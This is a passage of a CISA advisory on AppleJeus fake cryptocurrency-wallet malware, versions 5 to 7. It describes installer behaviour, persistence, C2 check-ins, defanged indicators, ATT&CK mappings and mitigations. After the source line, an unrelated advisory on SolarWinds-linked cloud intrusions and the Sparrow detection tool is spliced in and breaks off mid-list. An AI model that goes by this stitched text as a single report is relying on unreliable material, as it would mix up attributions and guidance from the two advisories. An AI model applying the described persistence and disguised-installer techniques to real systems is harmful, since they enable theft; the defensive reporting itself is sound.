The installer appears to be legitimate and will execute the following actions.\n\n * Installs `CoinGoTrade.exe` in folder `C:\\Program Files (x86)\\CoinGoTrade`\n * Installs `CoinGoTradeUpdate.exe` in folder `C:\\Users\\<username>\\AppData\\Roaming\\CoinGoTradeSupport`\n * Runs `CoinGoTradeUpdate.exe`\n\n`CoinGoTrade.exe` loads a legitimate-looking cryptocurrency wallet platform with no signs of malicious activity and is a copy of an open-source cryptocurrency application.\n\n`CoinGoTradeUpdate.exe` first installs itself as a service (_Create or Modify System Process: Windows Service _[[T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003>)]), which will automatically start when any user logs on (_Boot or Logon Autostart Execution _[[T1547](<https://attack.mitre.org/versions/v8/techniques/T1547/>)]). The service is installed with a description stating it is an \u201cAutomatic CoinGoTrade Upgrade.\u201d When launched, it collects the victim\u2019s host information (_System Owner/User Discovery _[[T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>)]), combines the information in strings before exfiltration, and sends it to a C2 website (_Exfiltration Over C2_ _Channel _[[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]).\n\n#### **_macOS X Program_**\n\nThe macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation. 
The installer executes the following actions.

 * Installs `CoinGoTrade` in folder `/Applications/CoinGoTrade.app/Contents/MacOS/`
 * Installs `CoinGoTradeUpgradeDaemon` in folder `/Applications/CoinGoTrade.app/Contents/MacOS/`
 * Executes a `postinstall` script
 * Creates `CoinGoTradeService` folder in `/Library/Application Support` folder
 * Moves `CoinGoTradeUpgradeDaemon` to the new folder
 * Moves `com.coingotrade.pkg.product.plist` to folder `/Library/LaunchDaemons/`
 * Runs `CoinGoTradeUpgradeDaemon` in the background

The `CoinGoTrade` program is likely a copy of an open-source cryptocurrency wallet application and loads a legitimate-looking, fully functional wallet program.

The `CoinGoTradeUpgradeDaemon` program calls its function `CheckUpdate` (which contains most of the logic functionality of the malware) and sends a `POST` to the C2 server with a connection named “CoinGoTrade 1.0 (Check Update Osx)” (_Application Layer Protocol: Web Protocols_ [[T1071.001](<https://attack.mitre.org/versions/v8/techniques/T1071/001>)]). If the C2 server returns a file, it is decoded and written to the victim’s folder `/private/tmp/updatecoingotrade` with permissions set by the command `chmod 700` (only the owner can read, write, and execute) (_Command and Scripting Interpreter_ [[T1059](<https://attack.mitre.org/versions/v8/techniques/T1059/>)]). Stage 2 is then launched, and the malware, `CoinGoTradeUpgradeDaemon`, returns to sleeping and checking in with the C2 server at predetermined intervals (_Application Layer Protocol: Web Protocols_ [[T1071.001](<https://attack.mitre.org/versions/v8/techniques/T1071/001>)]).

The `postinstall` script has similar functionality to the other scripts (_Command and Scripting Interpreter: Unix Shell_ [[T1059.004](<https://attack.mitre.org/versions/v8/techniques/T1059/004/>)]) and installs `CoinGoTrade` and `CoinGoTradeUpgradeDaemon` in folder `/Applications/CoinGoTrade.app/Contents/MacOS/`.
It moves the property list (plist) file `com.coingotrade.pkg.product.plist` to the `/Library/LaunchDaemons/` folder (_Scheduled Task/Job: Launchd_ [[T1053.004](<https://attack.mitre.org/versions/v8/techniques/T1053/004/>)]). Because the `LaunchDaemon` will not run automatically after the `plist` file is moved, the `postinstall` script launches `CoinGoTradeUpgradeDaemon` and runs it in the background (_Create or Modify System Process: Launch Daemon_ [[T1543.004](<https://attack.mitre.org/versions/v8/techniques/T1543/004/>)]).

#### **_Payload_**

The Windows malware’s payload could not be downloaded because the C2 server is no longer accessible. Additionally, none of the open-source reporting for this sample contained copies of the payload. The Windows payload is likely similar in functionality to the macOS X stage 2 detailed below.

The stage 2 payload for the macOS X malware was no longer available from the specified download URL. Still, a file was submitted to VirusTotal by the same user on the same date as the macOS X `CoinGoTradeUpgradeDaemon`. These clues suggest that the submitted file may be related to the macOS X version of the malware and the downloaded payload.

The file `prtspool` is a 64-bit Mach-O executable with a large variety of features, all of which were confirmed to be working functionality. The file has three C2 URLs hardcoded into it and communicates with them using HTTP `POST` requests with a multipart/form-data boundary string. Like other HIDDEN COBRA malware, `prtspool` uses format strings to store data collected about the system and sends it to the C2s.

For more details on AppleJeus Version 5: CoinGoTrade, see [MAR-10322463-5.v1](<https://us-cert.gov/ncas/analysis-reports/ar21-048e>).

### AppleJeus Version 6: Dorusio

#### **Introduction and Infrastructure**

In March 2020, an additional version of the AppleJeus malware was identified.
This time the malware was marketed and distributed by a legitimate-looking company called Dorusio on their website, `dorusio[.]com` (_Acquire Infrastructure: Domain_ [[T1583.001](<https://attack.mitre.org/versions/v8/techniques/T1583/001/>)]). Researchers collected samples for Windows and macOS X versions of the Dorusio Wallet (_Develop Capabilities: Malware_ [[T1587.001](<https://attack.mitre.org/versions/v8/techniques/T1587/001/>)]). As of at least early 2020, the actual download links result in `404` errors. The download page has release notes with version revisions claiming to start with version 1.0.0, released on April 15, 2019.

The domain `dorusio[.]com` resolved to IP address `198.54.115[.]51` from March 30, 2020, to January 23, 2021. The IP address is controlled by NameCheap Inc. (ASN 22612) and is located in Atlanta, GA. This IP address is in the same ASN as `CoinGoTrade[.]com` and `Ants2Whale[.]com`.

The domain `dorusio[.]com` had a valid Sectigo SSL certificate (_Obtain Capabilities: Digital Certificates_ [[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). The SSL certificate was “Domain Control Validated,” a weak security verification level that does not require validation of the owner’s identity or the actual business’s existence.

#### **Dorusio Application Analysis**

#### **_Windows Program_**

The Windows version of the malicious application is an MSI Installer.
The installer appears to be legitimate and will execute the following actions.

 * Installs `Dorusio.exe` in folder `C:\Program Files (x86)\Dorusio`
 * Installs `DorusioUpgrade.exe` in folder `C:\Users\<username>\AppData\Roaming\DorusioSupport`
 * Runs `DorusioUpgrade.exe`

The program `Dorusio.exe` loads a legitimate-looking cryptocurrency wallet platform with no signs of malicious activity and is a copy of an open-source cryptocurrency application.

The program `DorusioUpgrade.exe` first installs itself as a service (_Create or Modify System Process: Windows Service_ [[T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003>)]), which will automatically start when any user logs on (_Boot or Logon Autostart Execution_ [[T1547](<https://attack.mitre.org/versions/v8/techniques/T1547/>)]). The service is installed with a description stating it is an “Automatic Dorusio Upgrade.” When launched, it collects the victim’s host information (_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>)]), combines the information in strings before exfiltration, and sends it to a C2 website (_Exfiltration Over C2 Channel_ [[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]).

#### **_macOS X Program_**

The macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation.
The installer executes the following actions.

 * Installs `Dorusio` in folder `/Applications/Dorusio.app/Contents/MacOS/`
 * Installs `Dorusio_upgrade` in folder `/Applications/Dorusio.app/Contents/MacOS/`
 * Executes a `postinstall` script
 * Creates `DorusioDaemon` folder in `/Library/Application Support` folder
 * Moves `Dorusio_upgrade` to the new folder
 * Moves `com.dorusio.pkg.wallet.plist` to folder `/Library/LaunchDaemons/`
 * Runs `Dorusio_upgrade` in the background

The `Dorusio` program is likely a copy of an open-source cryptocurrency wallet application and loads a legitimate-looking, fully functional wallet program. Aside from the Dorusio logo and two new services, the wallet appears to be the same as the Kupay Wallet. This application seems to be a modification of the open-source cryptocurrency wallet Copay distributed by Atlanta-based company BitPay.

The `Dorusio_upgrade` program calls its function `CheckUpdate` (which contains most of the logic functionality of the malware) and sends a `POST` to the C2 server with a connection named “Dorusio Wallet 2.1.0 (Check Update Osx)” (_Application Layer Protocol: Web Protocols_ [[T1071.001](<https://attack.mitre.org/versions/v8/techniques/T1071/001>)]). If the C2 server returns a file, it is decoded and written to the victim’s folder `/private/tmp/Dorusio_update` with permissions set by the command `chmod 700` (only the owner can read, write, and execute) (_Command and Scripting Interpreter_ [[T1059](<https://attack.mitre.org/versions/v8/techniques/T1059/>)]).
Stage 2 is then launched, and the malware, `Dorusio_upgrade`, returns to sleeping and checking in with the C2 server at predetermined intervals (_Application Layer Protocol: Web Protocols_ [[T1071.001](<https://attack.mitre.org/versions/v8/techniques/T1071/001>)]).

The `postinstall` script has similar functionality to other AppleJeus scripts (_Command and Scripting Interpreter: Unix Shell_ [[T1059.004](<https://attack.mitre.org/versions/v8/techniques/T1059/004/>)]). It creates the `DorusioDaemon` folder in the `/Library/Application Support` folder and then moves `Dorusio_upgrade` to the new folder. It moves the property list (`plist`) file `com.dorusio.pkg.wallet.plist` from the Installer package to the `/Library/LaunchDaemons/` folder (_Scheduled Task/Job: Launchd_ [[T1053.004](<https://attack.mitre.org/versions/v8/techniques/T1053/004/>)]). Because the `LaunchDaemon` will not run automatically after the `plist` file is moved, the `postinstall` script launches `Dorusio_upgrade` and runs it in the background (_Create or Modify System Process: Launch Daemon_ [[T1543.004](<https://attack.mitre.org/versions/v8/techniques/T1543/004/>)]).

#### **_Payload_**

Neither the Windows nor the macOS X malware’s payload could be downloaded because the C2 server is no longer accessible.
The payloads are likely similar in functionality to the macOS X stage 2 from CoinGoTrade and Kupay Wallet, or the Windows stage 2 from Union Crypto.

For more details on AppleJeus Version 6: Dorusio, see [MAR-10322463-6.v1](<https://us-cert.gov/ncas/analysis-reports/ar21-048f>).

### AppleJeus 4, 5, and 6 Installation Conflicts

If a user attempts to install the Kupay Wallet, CoinGoTrade, and Dorusio applications on the same system, they will encounter installation conflicts.

If Kupay Wallet is already installed on a system and the user tries to install CoinGoTrade or Dorusio:

 * Pop-up windows appear, stating a more recent version of the program is already installed.

If CoinGoTrade is already installed on a system and the user attempts to install Kupay Wallet:

 * `Kupay.exe` will be installed in the `C:\Program Files (x86)\CoinGoTrade\` folder.
 * All `CoinGoTrade` files will be deleted.
 * The folders and files contained in `C:\Users\<username>\AppData\Roaming\CoinGoTradeSupport` will remain installed.
 * `KupayUpgrade.exe` is installed in the new folder `C:\Users\<username>\AppData\Roaming\KupaySupport`.

If Dorusio is already installed on a system and the user attempts to install Kupay Wallet:

 * `Kupay.exe` will be installed in the `C:\Program Files (x86)\Dorusio\` folder.
 * All `Dorusio.exe` files will be deleted.
 * The folders and files contained in `C:\Users\<username>\AppData\Roaming\DorusioSupport` will remain installed.
 * `KupayUpgrade.exe` is installed in the new folder `C:\Users\<username>\AppData\Roaming\KupaySupport`.

### AppleJeus Version 7: Ants2Whale

#### **Introduction and Infrastructure**

In late 2020, a new version of AppleJeus was identified called “Ants2Whale.” The site for this version of AppleJeus is `ants2whale[.]com` (_Acquire Infrastructure: Domain_ [[T1583.001](<https://attack.mitre.org/versions/v8/techniques/T1583/001/>)]).
The website shows a legitimate-looking cryptocurrency company and application. The website contains multiple spelling and grammar mistakes, indicating the creator may not have English as a first language. The website states that to download Ants2Whale, a user must contact the administrator, as their product is a “premium package” (_Develop Capabilities: Malware_ [[T1587.001](<https://attack.mitre.org/versions/v8/techniques/T1587/001/>)]).

The domain `ants2whale[.]com` resolved to IP address `198.54.114[.]237` from September 23, 2020, to January 22, 2021. The IP address is controlled by NameCheap Inc. (ASN 22612) and is located in Atlanta, GA. This IP address is in the same ASN as `CoinGoTrade[.]com` and `Dorusio[.]com`.

The domain `ants2whale[.]com` had a valid Sectigo SSL certificate (_Obtain Capabilities: Digital Certificates_ [[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). The SSL certificate was “Domain Control Validated,” a weak security verification level that does not require validation of the owner’s identity or the actual business’s existence.

#### **Ants2Whale Application Analysis**

#### **_Windows Program_**

As of late 2020, the Windows program was not available on VirusTotal. It is likely very similar to the macOS X version detailed below.

#### **_macOS X Program_**

The macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation.
The installer executes the following actions.

 * Installs `Ants2Whale` in folder `/Applications/Ants2whale.app/Contents/MacOS/Ants2whale`
 * Installs `Ants2WhaleHelper` in folder `/Library/Application Support/Ants2WhaleSupport/`
 * Executes a `postinstall` script
 * Moves `com.Ants2whale.pkg.wallet.plist` to folder `/Library/LaunchDaemons/`
 * Runs `Ants2WhaleHelper` in the background

The `Ants2Whale` and `Ants2WhaleHelper` programs and the `postinstall` script function almost identically to previous versions of AppleJeus and will not be discussed in depth in this advisory.

For more details on AppleJeus Version 7: Ants2Whale, see [MAR-10322463-7.v1](<https://us-cert.gov/ncas/analysis-reports/ar21-048g>).

### ATT&CK Profile

Figure 2 and table 2 provide summaries of the MITRE ATT&CK techniques observed.

_Figure 2: MITRE ATT&CK enterprise techniques used by AppleJeus_

_Table 2: MITRE ATT&CK techniques observed_

**Tactic Title** | **Technique ID** | **Technique Title**
---|---|---
[Resource Development [TA0042]](<https://attack.mitre.org/versions/v8/tactics/TA0042/>) | T1583.001 | Acquire Infrastructure: Domain
[Resource Development [TA0042]](<https://attack.mitre.org/versions/v8/tactics/TA0042/>) | T1583.006 | Acquire Infrastructure: Web Services
[Resource Development [TA0042]](<https://attack.mitre.org/versions/v8/tactics/TA0042/>) | T1587.001 | Develop Capabilities: Malware
[Resource Development [TA0042]](<https://attack.mitre.org/versions/v8/tactics/TA0042/>) | T1588.003 | Obtain Capabilities: Code Signing Certificates
[Resource Development [TA0042]](<https://attack.mitre.org/versions/v8/tactics/TA0042/>) | T1588.004 | Obtain Capabilities: Digital Certificates
[Initial Access [TA0001]](<https://attack.mitre.org/versions/v8/tactics/TA0001>) | T1566.002 | Phishing: Spearphishing Link
[Execution [TA0002]](<https://attack.mitre.org/versions/v8/tactics/TA0002>) | T1059 | Command and Scripting Interpreter
[Execution [TA0002]](<https://attack.mitre.org/versions/v8/tactics/TA0002>) | T1059.004 | Command and Scripting Interpreter: Unix Shell
[Execution [TA0002]](<https://attack.mitre.org/versions/v8/tactics/TA0002>) | T1204.002 | User Execution: Malicious File
[Persistence [TA0003]](<https://attack.mitre.org/versions/v8/tactics/TA0003>) | T1053.004 | Scheduled Task/Job: Launchd
[Persistence [TA0003]](<https://attack.mitre.org/versions/v8/tactics/TA0003>) | T1543.004 | Create or Modify System Process: Launch Daemon
[Persistence [TA0003]](<https://attack.mitre.org/versions/v8/tactics/TA0003>) | T1547 | Boot or Logon Autostart Execution
[Privilege Escalation [TA0004]](<https://attack.mitre.org/versions/v8/tactics/TA0004>) | T1053.005 | Scheduled Task/Job: Scheduled Task
[Defense Evasion [TA0005]](<https://attack.mitre.org/versions/v8/tactics/TA0005>) | T1027 | Obfuscated Files or Information
[Defense Evasion [TA0005]](<https://attack.mitre.org/versions/v8/tactics/TA0005>) | T1548 | Abuse Elevation Control Mechanism
[Defense Evasion [TA0005]](<https://attack.mitre.org/versions/v8/tactics/TA0005>) | T1564.001 | Hide Artifacts: Hidden Files and Directories
[Discovery [TA0007]](<https://attack.mitre.org/versions/v8/tactics/TA0007>) | T1033 | System Owner/User Discovery
[Exfiltration [TA0010]](<https://attack.mitre.org/versions/v8/tactics/TA0010>) | T1041 | Exfiltration Over C2 Channel
[Command and Control [TA0011]](<https://attack.mitre.org/versions/v8/tactics/TA0011>) | T1071.001 | Application Layer Protocol: Web Protocols
[Command and Control [TA0011]](<https://attack.mitre.org/versions/v8/tactics/TA0011>) | T1573 | Encrypted Channel
[Command and Control [TA0011]](<https://attack.mitre.org/versions/v8/tactics/TA0011>) | T1573.001 | Encrypted Channel: Symmetric Cryptography

### Mitigations

### Compromise Mitigations

Organizations that identify AppleJeus malware within their networks should take immediate action.
Initial actions should include the following steps.

 * Contact the FBI, CISA, or Treasury immediately regarding any identified activity related to AppleJeus. (Refer to the Contact Information section below.)
 * Initiate your organization’s incident response plan.
 * Generate new keys for wallets, and/or move to new wallets.
 * Introduce a two-factor authentication solution as an extra layer of verification.
 * Use hardware wallets, which keep the private keys in a separate, secured storage area.
 * To move funds out of a compromised wallet:
   * Do not use the malware listed in this advisory to transfer funds, and
   * Form all transactions offline and then broadcast them to the network all at once in a short online session, ideally prior to the attacker accessing them.
 * Remove impacted hosts from the network.
 * Assume the threat actors have moved laterally within the network and downloaded additional malware.
 * Change all passwords to any accounts associated with impacted hosts.
 * Reimage impacted host(s).
 * Install anti-virus software to run daily deep scans of the host.
 * Ensure your anti-virus software is set up to download the latest signatures daily.
 * Install host-based intrusion detection system (HIDS) software and keep it up to date.
 * Ensure all software and hardware is up to date, and all patches have been installed.
 * Ensure a network-based firewall is installed and/or up to date.
 * Ensure the firewall’s firmware is up to date.

### Pro-Active Mitigations

Consider the following recommendations for defense against AppleJeus malware and related activity.

#### _Cryptocurrency Users_

 * Verify the source of cryptocurrency-related applications.
 * Use multiple wallets for key storage, striking the appropriate risk balance between hot and cold storage.
 * Use custodial accounts with multi-factor authentication mechanisms for both user and device verification.
 * Patronize cryptocurrency service businesses that offer indemnity protections for lost or stolen cryptocurrency.
 * Consider having a dedicated device for cryptocurrency management.

#### _Financial Service Companies_

 * Verify compliance with Federal Financial Institutions Examination Council (FFIEC) handbooks at [https://ithandbook.ffiec.gov](<https://ithandbook.ffiec.gov/>), especially those related to information security.
 * Report suspicious cyber and financial activities.
For more information on mandatory and voluntary reporting of cyber events via suspicious activity reports, see the Financial Crimes Enforcement Network (FinCEN) Advisory FIN-2016-A005: Advisory to Financial Institutions on Cyber-Events and Cyber-Enabled Crime at <https://www.fincen.gov/sites/default/files/advisory/2016-10-25/Cyber%20Threats%20Advisory%20-%20FINAL%20508_2.pdf> and FinCEN’s Section 314(b) Fact Sheet at <https://www.fincen.gov/sites/default/files/shared/314bfactsheet.pdf>.

#### _Cryptocurrency Businesses_

 * Verify compliance with the Cryptocurrency Security Standard at <http://cryptoconsortium.github.io/CCSS/>.

#### _All Organizations_

 * Incorporate IOCs identified in CISA’s Malware Analysis Reports on <https://us-cert.cisa.gov/northkorea> into intrusion detection systems and security alert systems to enable active blocking or reporting of suspected malicious activity.
 * See table 3 below, which provides a summary of preventative ATT&CK mitigations based on observed techniques.

_Table 3: MITRE ATT&CK mitigations based on observed techniques_

**Mitigation** | **Description**
---|---
[User Training [M1017]](<https://attack.mitre.org/versions/v8/mitigations/M1017>) | Train users to identify social engineering techniques and spearphishing emails.
[User Training [M1017]](<https://attack.mitre.org/versions/v8/mitigations/M1017>) | Provide users with awareness of common phishing and spearphishing techniques and raise suspicion for potentially malicious events.
[User Account Management [M1018]](<https://attack.mitre.org/versions/v8/mitigations/M1018>) | Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons.
[User Account Management [M1018]](<https://attack.mitre.org/versions/v8/mitigations/M1018>) | Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems.
[SSL/TLS Inspection [M1020]](<https://attack.mitre.org/versions/v8/mitigations/M1020>) | Use SSL/TLS inspection to see encrypted sessions’ contents to look for network-based indicators of malware communication protocols.
[Restrict Web-Based Content [M1021]](<https://attack.mitre.org/versions/v8/mitigations/M1021>) | Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if the activity cannot be monitored well or poses a significant risk.
[Restrict Web-Based Content [M1021]](<https://attack.mitre.org/versions/v8/mitigations/M1021>) | Block script extensions to prevent the execution of scripts and HTA files that may commonly be used during the exploitation process.
[Restrict Web-Based Content [M1021]](<https://attack.mitre.org/versions/v8/mitigations/M1021>) | Employ an adblocker to prevent malicious code served up through ads from executing.
[Restrict File and Directory Permissions [M1022]](<https://attack.mitre.org/versions/v8/mitigations/M1022>) | Prevent all users from writing to the `/Library/StartupItems` directory to prevent any startup items from getting registered, since `StartupItems` are deprecated.
[Privileged Account Management [M1026]](<https://attack.mitre.org/versions/v8/mitigations/M1026>) | When PowerShell is necessary, restrict PowerShell execution policy to administrators. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration.
[Privileged Account Management [M1026]](<https://attack.mitre.org/versions/v8/mitigations/M1026>) | Configure the Increase Scheduling Priority option to allow only the Administrators group the rights to schedule a priority process.
[Operating System Configuration [M1028]](<https://attack.mitre.org/versions/v8/mitigations/M1028>) | Configure settings for scheduled tasks to force tasks to run under the authenticated account’s context instead of allowing them to run as SYSTEM.
[Network Intrusion Prevention [M1031]](<https://attack.mitre.org/versions/v8/mitigations/M1031>) | Use network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware and mitigate activity at the network level.
[Execution Prevention [M1038]](<https://attack.mitre.org/versions/v8/mitigations/M1038>) | Use application control tools where appropriate.
[Execution Prevention [M1038]](<https://attack.mitre.org/versions/v8/mitigations/M1038>) | Use application control tools to prevent the running of executables masquerading as other files.
[Behavior Prevention on Endpoint [M1040]](<https://attack.mitre.org/versions/v8/mitigations/M1040>) | Configure endpoints (if possible) to block some process injection types based on common sequences of behavior during the injection process.
[Disable or Remove Feature or Program [M1042]](<https://attack.mitre.org/versions/v8/mitigations/M1042>) | Disable or remove any unnecessary or unused shells or interpreters.
[Code Signing [M1045]](<https://attack.mitre.org/versions/v8/mitigations/M1045>) | Where possible, only permit the execution of signed scripts.
[Audit [M1047]](<https://attack.mitre.org/versions/v8/mitigations/M1047>) | Audit logging for `launchd` events in macOS can be reviewed or centrally collected using multiple options, such as Syslog, OpenBSM, or OSquery.
[Audit [M1047]](<https://attack.mitre.org/versions/v8/mitigations/M1047>) | Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges.
[Antivirus/Antimalware [M1049]](<https://attack.mitre.org/versions/v8/mitigations/M1049>) | Use an antivirus program to quarantine suspicious files automatically.

### Contact Information

Recipients of this report are encouraged to contribute any additional information that they may have related to this threat.

For any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:

 * The FBI through the FBI Cyber Division (855-292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>)) or a [local field office](<https://www.fbi.gov/contact-us/field-offices/field-offices>),
 * CISA (888-282-0870 or [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>)), or
 * Treasury Office of Cybersecurity and Critical Infrastructure Protection (Treasury OCCIP) (202-622-3000 or [OCCIP-Coord@treasury.gov](<mailto:OCCIP-Coord@treasury.gov>)).

### Revisions

 * February 17, 2021: Initial Version
 * April 15, 2021: Updated MITRE ATT&CK technique from Command and Scripting Interpreter: AppleScript [T1059.002] to Command and Scripting Interpreter: Unix Shell [T1059.004].

_Source record: AA21-048A, “AppleJeus: Analysis of North Korea’s Cryptocurrency Malware,” <https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-048a> (record dated April 15, 2021)._

### Summary

_This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/techniques/enterprise/>) for all referenced threat actor tactics and techniques._

_**Updated April 15, 2021: The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR). Additional information may be found in a [statement from the White House](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>). For more information on SolarWinds-related activity, go to <https://us-cert.cisa.gov/remediating-apt-compromised-networks> and <https://www.cisa.gov/supply-chain-compromise>.**_

This Alert is a companion alert to [AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>). AA20-352A primarily focuses on an advanced persistent threat (APT) actor’s compromise of SolarWinds Orion products as an initial access vector into networks of U.S. Government agencies, critical infrastructure entities, and private network organizations. As noted in AA20-352A, the Cybersecurity and Infrastructure Security Agency (CISA) has evidence of initial access vectors in addition to the compromised SolarWinds Orion products.

This Alert also addresses activity, irrespective of the initial access vector leveraged, that CISA attributes to an APT actor. Specifically, CISA has seen an APT actor using compromised applications in a victim’s Microsoft 365 (M365)/Azure environment. CISA has also seen this APT actor utilizing additional credentials and Application Programming Interface (API) access to cloud resources of private and public sector organizations.
These tactics, techniques, and procedures (TTPs) feature three key components:

 * Compromising or bypassing federated identity solutions;
 * Using forged authentication tokens to move laterally to Microsoft cloud environments; and
 * Using privileged access to a victim’s cloud environment to establish difficult-to-detect persistence mechanisms for Application Programming Interface (API)-based access.

This Alert describes these TTPs and offers an overview of, and guidance on, available open-source tools, including a CISA-developed tool, Sparrow, for network defenders to analyze their Microsoft Azure Active Directory (AD), Office 365 (O365), and M365 environments to detect potentially malicious activity.

**Note**: this Alert describes artifacts, presented by these attacks, from which CISA has identified detectable evidence of the threat actor’s initial objectives. CISA continues to analyze the threat actor’s follow-on objectives.

### Technical Details

Frequently, CISA has observed the APT actor gaining _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v8/tactics/TA0001/>)] to victims’ enterprise networks via compromised SolarWinds Orion products (e.g., Solorigate, Sunburst).[[1]](<https://www.zdnet.com/article/a-second-hacking-group-has-targeted-solarwinds-systems/>) However, CISA is investigating instances in which the threat actor may have obtained initial access by _Password Guessing_ [[T1110.001](<https://attack.mitre.org/versions/v8/techniques/T1110/001/>)], _Password Spraying_ [[T1110.003](<https://attack.mitre.org/versions/v8/techniques/T1110/003>)], and/or exploiting inappropriately secured administrative or service credentials (_Unsecured Credentials_ [[T1552](<https://attack.mitre.org/versions/v8/techniques/T1552/>)]) instead of utilizing the compromised SolarWinds Orion products.

CISA observed this threat actor moving from user context to administrator rights for _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v8/tactics/TA0004/>)] within a compromised network and using native Windows tools and techniques, such as Windows Management Instrumentation (WMI), to enumerate the Microsoft Active Directory Federated Services (ADFS) certificate-signing capability. This enumeration allows threat actors to forge authentication tokens (OAuth) to issue claims to service providers, without having those claims checked against the identity provider, and then to move laterally to Microsoft Cloud environments (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v8/tactics/TA0008/>)]).

The threat actor has also used on-premises access to manipulate and bypass identity controls and multi-factor authentication. This activity demonstrates how sophisticated adversaries can use credentials from one portion of an organization to move laterally (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v8/tactics/TA0008/>)]) through trust boundaries, evade defenses and detection (_Defense Evasion_ [[TA0005](<https://attack.mitre.org/versions/v8/tactics/TA0005/>)]), and steal sensitive data (_Collection_ [[TA0009](<https://attack.mitre.org/versions/v8/tactics/TA0009/>)]).

This level of compromise is challenging to remediate and requires a rigorous multi-disciplinary effort to regain administrative control before recovering.

### Mitigations

#### Detection

Guidance on identifying affected SolarWinds software is well documented.[[2]](<https://www.cisa.gov/supply-chain-compromise>) However, once an organization identifies a compromise via SolarWinds Orion products or other threat actor TTPs, identifying follow-on activity for on-premises networks requires fine-tuned network and host-based forensics.

The nature of cloud forensics is unique due to the growing and rapidly evolving technology footprints of major vendors.
Microsoft's O365 and M365 environments have built-in capabilities for detecting unusual activity. Microsoft also provides premium services (Advanced Threat Protection [ATP] and Azure Sentinel), which enable network defenders to investigate TTPs specific to the Solorigate activity.[[3]](<https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095 >)\n\n#### Detection Tools\n\n_CISA is providing examples of detection tools for informational purposes only. CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\nThere are a number of open-source tools available to investigate adversary activity in Microsoft cloud environments and to detect unusual activity, service principals, and application activity.[[4]](<https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/ >) Publicly available PowerShell tools that network defenders can use to investigate M365 and Microsoft Azure include:\n\n * CISA's Sparrow,\n * Open-source utility Hawk, and\n * CrowdStrike's Azure Reporting Tool (CRT).\n\nAdditionally, Microsoft's Office 365 Management API and Graph API provide an open interface for ingesting telemetry and evaluating service configurations for signs of anomalous activity and intrusion.\n\n**Note**: these open-source tools are highlighted and explained to assist with on-site investigation and remediation in cloud environments but are not all-encompassing. Open source tools can be complemented by services such as Azure Sentinel, a Microsoft premium service that provides comprehensive analysis tools, including custom detections for the activity indicated.\n\n#### General Guidance on Using Detection Tools\n\n 1. Audit the creation and use of service principal credentials. 
Look for unusual application usage, such as use of dormant applications.\n 2. Audit the assignment of credentials to applications that allow non-interactive sign-in by the application. Look for unexpected trust relationships added to the Azure Active Directory.\n 3. Download the interactive sign-ins from the Azure admin portal or use the Microsoft Sentinel product. Review new token validation time periods with high values and investigate whether it was a legitimate change or an attempt to gain persistence by a threat actor.\n\n#### Sparrow\n\nCISA created [Sparrow](<https://github.com/cisagov/Sparrow>) to help network defenders detect possible compromised accounts and applications in the Azure/M365 environment. The tool focuses on the narrow scope of user and application activity endemic to identity- and authentication-based attacks seen recently in multiple sectors. It is neither comprehensive nor exhaustive of available data. It is intended to narrow a larger set of available investigation modules and telemetry to those specific to recent attacks on federated identity sources and applications.\n\n_(Updated April 8, 2021):_ CISA has also created \"Aviary,\" which is a companion Splunk dashboard that can assist in visualizing and reviewing the output of Sparrow. Network defenders can find Aviary on [CISA's Sparrow GitHub page](<https://github.com/cisagov/Sparrow>). CISA advises network defenders to perform the following actions to use Sparrow:\n\n 1. Use Sparrow to detect any recent domain authentication or federation modifications. \n 1. Domain and federation modification operations are uncommon and should be investigated.\n 2. Examine logs for new and modified credentials applied to applications and service principals; delineate for the credential type. Sparrow can be used to detect the modification of service principals and application credentials. \n\n 1. Create a timeline for all credential changes, focusing on recent wholesale changes.\n 2. 
